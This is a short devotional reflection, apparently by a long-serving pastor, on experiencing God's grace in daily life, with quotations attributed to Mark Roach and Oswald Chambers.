Recently God has been pouring into my heart a fresh revelation of His grace. It is enlightening, it is exciting, it is perplexing. Why is that now, 40 years after being born again and after 35 years of pastoral ministry, I am being overwhelmed and blown away by the wonderful grace of God?
More times than not when we talk about the grace of God we think of it in regards to salvation. And though God’s saving grace is real and needs to be celebrated every day of our lives, we also need to be aware of the grace that God daily pours out in the lives of those who walk with Him in obedience.
As I have contemplated God’s gifts of grace I have thought about the grace of His protection, the grace of His provision, the grace of family, the grace of being part of the wonderful family of God, the Church.
Mark Roach, wrote these words concerning the grace of God. “I’m surrounded, I’m astounded by Your presence in this place. I can hear You, I can feel You, I can almost touch Your face. So I lift my hands to praise You surrounded by Your grace.”
Of the lengths that God will go to bless His children, Oswald Chambers said, “And all Almighty God has is ours in the Lord Jesus Christ! He will tax the last grain of sand on earth and the remotest star in the heavens to bless us if we will obey Him.”
How has your life been touched recently by God’s wonderful gifts of grace?
